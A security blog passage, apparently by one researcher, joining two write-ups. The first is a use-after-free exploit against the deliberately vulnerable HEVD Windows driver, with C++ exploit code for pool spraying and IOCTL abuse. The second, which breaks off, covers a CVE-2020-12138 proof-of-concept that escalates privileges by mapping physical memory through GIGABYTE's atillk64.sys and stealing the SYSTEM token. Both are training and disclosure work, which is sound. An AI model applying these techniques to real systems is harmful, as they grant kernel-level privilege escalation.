  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this exercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working, which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like although we have to utilize multiple functions via IOCTL, this is actually a simpler exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, after doing this exercise, it seems like we need the following:

  • allocate an object in the non-paged pool,
  • a mechanism that creates a reference to the object as a global variable, ie if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
  • the ability to free the memory and not have the previously established reference NULLed out, ie when the chunk is freed the program author doesn’t specify that the reference=NULL,
  • the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
  • the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
  • finally, the ability to use the no-longer valid reference to our freed chunk.
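
The list above can be modeled in plain user-mode C++ without touching freed memory at all. This is a toy simulation, not driver code: `ToyPool`, `Callback` and `simulate_uaf` are names invented here, slots stand in for same-sized pool chunks, and a first-fit allocator is assumed so that a new allocation reuses the most recently opened hole.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

enum class Callback : std::uint32_t { None, DriverDefault, AttackerChosen };

// Toy pool of equally sized slots; each slot stores one "callback pointer".
struct ToyPool {
    struct Slot {
        bool in_use = false;
        Callback callback = Callback::None;
    };
    std::vector<Slot> slots;

    explicit ToyPool(std::size_t n) : slots(n) {}

    // First-fit allocation: the lowest free slot is reused.
    int alloc(Callback cb) {
        for (std::size_t i = 0; i < slots.size(); ++i) {
            if (!slots[i].in_use) {
                slots[i].in_use = true;
                slots[i].callback = cb;
                return static_cast<int>(i);
            }
        }
        return -1;
    }

    // Freeing only marks the slot free; nothing tells the holder of the index.
    void release(int idx) { slots[static_cast<std::size_t>(idx)].in_use = false; }
};

// Walks the steps from the list and returns the callback that the stale
// reference ends up pointing at.
Callback simulate_uaf() {
    ToyPool pool(4);
    int g_object = pool.alloc(Callback::DriverDefault);  // allocate + save "global" reference
    pool.release(g_object);                              // free, but g_object is never reset
    pool.alloc(Callback::AttackerChosen);                // fake object fills the same slot
    return pool.slots[static_cast<std::size_t>(g_object)].callback;  // "use" after free
}
```

Calling simulate_uaf() returns Callback::AttackerChosen: the stale reference still resolves, but to contents that were written by whoever filled the hole.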

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi, which is about where I’ve placed the breakpoint. We can then take the value in esi, which should be a pointer to our allocation, and go see what the allocation looks like after the subsequent memset operation completes. We can see some static values as well, such as what appears to be the size of the allocation (0x58). We know from our last post that this undersells the real size by 0x8, since we also have to account for the pool header, so our real allocation size in the pool is 0x60 bytes.
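
The size arithmetic is easy to get wrong, so here is a minimal sketch of it. `pool_chunk_size` is a hypothetical helper; the 0x8 header comes from the text above, while the 0x8 rounding granularity is my assumption for x86 and is not something this post confirms.

```cpp
#include <cassert>
#include <cstddef>

// Requested size plus pool header, rounded up to the pool granularity.
// Defaults: 0x8-byte header (from the post) and an assumed 0x8-byte granularity on x86.
constexpr std::size_t pool_chunk_size(std::size_t requested,
                                      std::size_t header = 0x8,
                                      std::size_t granularity = 0x8) {
    return (requested + header + granularity - 1) / granularity * granularity;
}

static_assert(pool_chunk_size(0x58) == 0x60, "UAF object: 0x58 requested, 0x60 in the pool");
static_assert(pool_chunk_size(0x1F8) == 0x200, "pool overflow buffer from the previous post");
```

The same helper reproduces the 0x200 chunk from the pool overflow post, where the driver requested 0x1F8 bytes.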

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters, except that the first DWORD value has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.

And lastly in the screenshot we can see that we move esi, which is the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable: this same variable will not be nulled out when the object is freed.

Freeing the UAF Object

Now, lets try interacting with the driver routine which allows us to free our object.

Not a whole lot here, but we can see that there is no effort made to NULL the global variable g_UseAfterFreeObject. You can see that even after we run the routine, the variable still holds the address of our freed allocation:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 with all A characters for testing. It even appends a null-terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at the start of the chunk that serves as the callback function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First things first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

  • defragment the pool with 10,000 objects
  • aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other contiguous block handle. That way, every hole that is created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program; it would’ve taken me a long time to troubleshoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserveObject.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during sequential spray\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!), we were able to get our pool looking the way we want. 0x60 byte chunks free surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
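
Eyeballing a dump like this works for one page, but counting usable holes by hand gets old fast. Below is a rough sketch of a parser for pasted `!pool` text. It assumes the line layout shown above (address, size, previous size, state, tag), and `PoolChunk`, `parse_pool_line`, `parse_pool_output` and `count_flanked_holes` are hypothetical names, not part of any debugger API.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <sstream>
#include <string>
#include <vector>

struct PoolChunk {
    std::uint32_t address = 0;
    std::uint32_t size = 0;
    bool allocated = false;
    std::string tag;
};

// Parses one chunk line of !pool output; returns false for any other line.
bool parse_pool_line(const std::string& line, PoolChunk& out) {
    std::istringstream in(line);
    std::string addr, kw1, size, kw2, kw3, prev, state, tag;
    if (!(in >> addr >> kw1 >> size >> kw2 >> kw3 >> prev >> state >> tag)) return false;
    if (kw1 != "size:" || kw2 != "previous" || kw3 != "size:") return false;
    if (addr[0] == '*') addr.erase(0, 1);  // '*' marks the chunk that was queried
    if (tag[0] == '*') tag.erase(0, 1);
    try {
        out.address = static_cast<std::uint32_t>(std::stoul(addr, nullptr, 16));
        out.size = static_cast<std::uint32_t>(std::stoul(size, nullptr, 16));
    } catch (...) {
        return false;  // not hex after all
    }
    out.allocated = (state == "(Allocated)");
    out.tag = tag;
    return true;
}

// Collects every chunk line from a pasted dump, skipping headers and notes.
std::vector<PoolChunk> parse_pool_output(const std::string& text) {
    std::vector<PoolChunk> chunks;
    std::istringstream in(text);
    std::string line;
    while (std::getline(in, line)) {
        PoolChunk chunk;
        if (parse_pool_line(line, chunk)) chunks.push_back(chunk);
    }
    return chunks;
}

// Counts free chunks of `size` bytes that have an allocated `tag` chunk on both sides.
std::size_t count_flanked_holes(const std::vector<PoolChunk>& chunks,
                                std::uint32_t size, const std::string& tag) {
    std::size_t holes = 0;
    for (std::size_t i = 1; i + 1 < chunks.size(); ++i) {
        const bool hole = !chunks[i].allocated && chunks[i].size == size;
        const bool left = chunks[i - 1].allocated && chunks[i - 1].tag == tag;
        const bool right = chunks[i + 1].allocated && chunks[i + 1].tag == tag;
        if (hole && left && right) ++holes;
    }
    return holes;
}
```

Feeding it the dump above with a size of 0x60 and the tag IoCo counts only the free chunks that sit between two of our sprayed objects, which are the ones we care about.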

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

  • spray the heap to get it like so ^^,
  • allocate our UAF object,
  • free our UAF object,
  • create our fake objects with malicious callback function pointers,
  • activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, and place that pointer into our input buffer when we create our fake objects. We then spray those fake objects into the holes we poked, so around 15,000 of them.

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sys

By: h0mbre
25 April 2020 at 04:00

Background

I’ve been focusing, really since the end of January, on working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn some more about Windows kernel exploitation and have really enjoyed my time a lot.

During this time, @ihack4falafel released some proof-of-concept exploits[1][2] against several Windows kernel-mode drivers. The takeaway from these write-ups, for me, was that 3rd party drivers that are responsible for overclocking, RGB light-management, hardware diagnostics are largely broken.

The types of vulnerabilities that were disclosed in these write-ups often were related to low-privileged users having the ability to interact with a kernel-mode driver that was able to directly manipulate physical memory, where all kinds of privileged information resides.

The last FuzzySecurity Windows Exploit Development Tutorial Series is b33f’s exploit against a Razer driver exploiting this very same type of vulnerability.

Getting more interested in this type of bug, I sought out more write-ups and found some great proof-of-concepts:

  • Jackson T’s write-up of an LG driver privilege escalation vulnerability,
  • hatRiot’s write-up of a Dell driver privilege escalation vulnerability, and
  • ReWolf’s write-up of a few different driver vulnerabilities within the same type of logic bug realm.

After reading through those, I decided to just start downloading similar software and searching for drivers that I hadn’t seen CVEs for and that had some key APIs. My criteria when searching was that the driver had to:

  • allow low-privileged users to interact with it,
  • have either an MmMapIoSpace or ZwMapViewOfSection import.

As someone who is very new to this type of thing, I figured with the help of the aforementioned walkthroughs, if I was able to find a driver that would allow me to interact with physical memory I could successfully develop an exploit.

Disclaimer

This is kind of a niche space and as a new person getting into this very specific type of target I wasn’t really aware of the best places to look for more information about these types of vulnerable drivers. The first few things I checked were that there were no CVEs for the driver and that the driver hadn’t been mentioned on Twitter by security researchers. By the time I had reversed the driver and discovered it to be vulnerable in theory, but without a working exploit, I realized that the driver had been classified as vulnerable by researchers Jesse Michael and Mickey Shkatov at Eclypsium. The driver gets a small mention in their github repo but without specifically identifying the vulnerabilities that exist.

I’m not claiming responsibility for finding the vulnerability, since I was far from the first. Jesse and Mickey were given all of the credit on the CVE application and I can prove this upon request.

I was able to get in contact with Jesse via Twitter and he was extremely charitable with his time. He gave me a great explanation of their interactions with a vendor about the driver.

At this point, since there was no published proof-of-concept, I decided to press on and develop the exploit, which Jesse wholeheartedly supported and encouraged. I figured I’d develop an exploit, show AMD the proof-of-concept, and give them 90 days to respond/patch or explain that they’re not concerned.

Huge thanks to Jesse for being so charitable. He’s also incredibly knowledgeable and was willing to teach me tons of things along the way when answering my questions.

GIGABYTE Fusion 2.0

One of the first software packages I downloaded was GIGABYTE’s Fusion 2.0 software which comes with several drivers. I won’t get any more in-depth with the types of drivers included other than the subject of this post, atillk64.sys. Using default installation options, the driver was installed here: C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys.

The driver file description states the product name is ATI Diagnostics version 5.11.9.0 and its copyright is ATI Technologies Inc. 2003. I’m not sure what other software packages out there also install this driver, but I’m sure Fusion 2.0 isn’t the only one. I’ve found that several of these hardware diagnostic/configuration software suites install licensed drivers that are often slightly modified (or not modified at all!) versions of known-to-be vulnerable code-bases like the classic WinIO.sys.

atillk64.sys Analysis

The first thing I needed to know was what types of permissions the driver had and if lower-privileged users could interact with the driver. Looking at the device with OSR’s devicetree, we can see that this is the case.

Reversing the driver was pretty easy even as a complete novice just because it is so small. There is hardly any surface area to explore and the IOCTL handler routine was pretty straightforward. MmMapIoSpace was one of the imports so I was already interested at this point.

One routine caught my attention early on because the API call chain was very similar to one of the driver routines that @ihack4falafel wrote up a proof-of-concept for.

The routine first calls MmMapIoSpace, which takes a physical address, a length, and a cache type as parameters, maps that physical range into system virtual address space, and returns a pointer to the virtual address that corresponds to the beginning of the range you asked to be mapped. At this point, this system address is not available to us as a userland process. It is stored in rax and the result is checked to make sure the API call succeeded and did not return NULL. After some experimentation, I found that as long as we pass a check that our input buffer is 0x18 in length, we are able to completely control two of the MmMapIoSpace parameters: NumberOfBytes and PhysicalAddress. These values are read at offsets from rdi, which holds the address of our input buffer. CacheType is hardcoded as 0.

If the call succeeded, a call is made to IoAllocateMdl with the same values. The virtual address returned by MmMapIoSpace is given as a parameter as well as the same Length value. This API also associates our newly created MDL with an IRP.

If the call succeeded, a subsequent call is made to MmBuildMdlForNonPagedPool which takes the MDL we just created and ‘updates it to describe the underlying physical pages.’ MSDN states that IoAllocateMdl doesn’t initialize the data array that follows the MDL structure, and that drivers should call MmBuildMdlForNonPagedPool to initialize the array and describe the physical memory in which the buffer resides.

Next is a call to MmMapLockedPages, which is an old and deprecated API. This call takes the updated MDL and maps the physical pages that are described by it into our process space. It returns the starting address of this mapping: the return value (rax) is eventually placed in rbx and moved to [rdi], which will be our output buffer in DeviceIoControl.

Subsequent API calls to IoFreeMdl and MmUnmapIoSpace perform some cleanup and free up the pool allocations (as far as I know, please correct me if I’m wrong).
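To make the 0x18-byte input buffer concrete, here is a minimal sketch of how it could be laid out. The field order follows the INPUT_BUFFER struct used in the exploit code; the names MapRequest and make_request are made up for this illustration, and the third field is assumed to be pure filler that only exists to satisfy the length check.

```cpp
#include <cstddef>
#include <cstdint>

// Assumed layout of the 0x18-byte input buffer. The driver reads the
// physical address and the length from it; the last field is filler.
struct MapRequest {
    std::uint64_t physical_address;  // becomes PhysicalAddress for MmMapIoSpace
    std::uint64_t number_of_bytes;   // becomes NumberOfBytes for MmMapIoSpace
    std::uint64_t padding;           // unused, only pads the buffer to 0x18
};

static_assert(sizeof(MapRequest) == 0x18, "driver expects a 0x18-byte input buffer");
static_assert(offsetof(MapRequest, number_of_bytes) == 0x8, "length follows the address");

// Builds a request for `length` bytes starting at physical address `phys`.
inline MapRequest make_request(std::uint64_t phys, std::uint64_t length) {
    return MapRequest{phys, length, 0x4141414141414141ULL};
}
```

The static_assert lines catch a wrong struct size at compile time, before a malformed buffer ever reaches the driver.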

Exploitation Strategy

The first 8 bytes of our output buffer at this point hold a pointer to the mapped memory in our process space.

Say we mapped 0x1000 bytes starting at physical address 0x100000000. All of the data from 0x100000000 to 0x100001000 would then be available to us within our process space. This is bad because we are a low-privileged process and this data can contain arbitrary system/privileged data.

The strategy for exploiting this was heavily informed by FuzzySec’s approach to exploiting his aforementioned Razer driver. At a high-level we are going to:

  • map physical memory into our process space,
  • parse through the data looking for “Proc” pool tags,
  • identify our calling process (typically cmd.exe) and note the location of our security token,
  • identify a process typically running as SYSTEM (something like lsass.exe) and note the value of its security token,
  • and finally, overwrite our token with the SYSTEM process token value to gain nt authority\system.

“Proc” Tags in the Pool

Following along with FuzzySec’s strategy here, the first thing we need to do is identify what these data structures actually look like in the pool. There will be a pool chunk header, which contains a tag, prepended to each pool allocation. The tag we’ll be looking for in our mapped memory is “Proc”, which is 0x636f7250 as an integer value.
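As a quick sanity check on that integer, the sketch below shows how the four ASCII bytes of the tag turn into 0x636f7250 when read as a little-endian DWORD. The helper name tag_to_u32 is made up for this illustration.

```cpp
#include <cstdint>

// Interprets four ASCII characters as a little-endian 32-bit integer,
// the way a DWORD read of the tag bytes behaves on x86/x64.
inline std::uint32_t tag_to_u32(const char (&tag)[5]) {
    std::uint32_t value = 0;
    for (int i = 0; i < 4; ++i) {
        // The first character ends up in the lowest byte.
        value |= static_cast<std::uint32_t>(static_cast<unsigned char>(tag[i])) << (8 * i);
    }
    return value;
}
```

'P' (0x50) lands in the lowest byte and 'c' (0x63) in the highest, which is why the constant reads like "corP" when written out in hex.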

To find some examples, we can use the kd !poolfind "Proc" command to identify pool allocations with our tag.

Looking at the output, we see we started scanning large pool allocations for the tag. I quit the process after 5 minutes or so as this should be enough sample data.

Scanning large pool allocation table for tag 0x636f7250 (Proc) (ffffd48c9d250000 : ffffd48c9d550000)

ffffd48ca040f340 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca10bd380 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca53b83e0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca21c60b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cb36e6410 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca09533b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca08c8310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9bfd40c0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9e59d310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9fce0310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca150f400 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cae7de390 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca0ddc330 : tag Proc, size     0xb70, Nonpaged pool

Just plugging in the first address there in the WinDBG Preview memory pane, we can see that from this address, if we subtract 0x10 and then add 0x4, we see our “Proc” tag.

kd> da ffffd48ca040f340-0x10+0x4
ffffd48c`a040f334  "[email protected]"

So we’ve identified a “Proc” pool allocation and we have a good idea of how they are allocated. As b33f explains, they are all 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a “Proc” tag might be.

So the first strategy we’ll employ in parsing for data we’re interested in is to start at our mapped address, iterate by 0x10 each time, and check the value at our address + 0x4 for “Proc”.
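A minimal sketch of that stride-based scan, run over an ordinary byte buffer standing in for one mapped chunk. The function name find_proc_candidates is an assumption for this example, and the memcpy read assumes a little-endian host, which holds for x86/x64 Windows.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::uint32_t kProcTag = 0x636f7250;  // "Proc"

// Returns the offset of every 0x10-aligned slot whose DWORD at +0x4
// equals the "Proc" tag. `data` stands in for one mapped chunk.
inline std::vector<std::size_t> find_proc_candidates(const std::vector<std::uint8_t>& data) {
    std::vector<std::size_t> hits;
    for (std::size_t off = 0; off + 0x8 <= data.size(); off += 0x10) {
        std::uint32_t value = 0;
        // memcpy avoids dereferencing a cast pointer into the buffer.
        std::memcpy(&value, data.data() + off + 0x4, sizeof(value));
        if (value == kProcTag) {
            hits.push_back(off);
        }
    }
    return hits;
}
```

A hit here is only a candidate: any 0x10-aligned slot that happens to hold those four bytes at +0x4 will match, so a second check is still needed before treating it as a process allocation.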

From here, we can appeal to the EPROCESS structure to find the hardcoded offsets to EPROCESS members we’re interested in, which are going to be:

  • ImageFileName (the name of the process),
  • UniqueProcessId, and
  • Token.

I did all my testing on Windows 10 build 18362 and these were the offsets:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

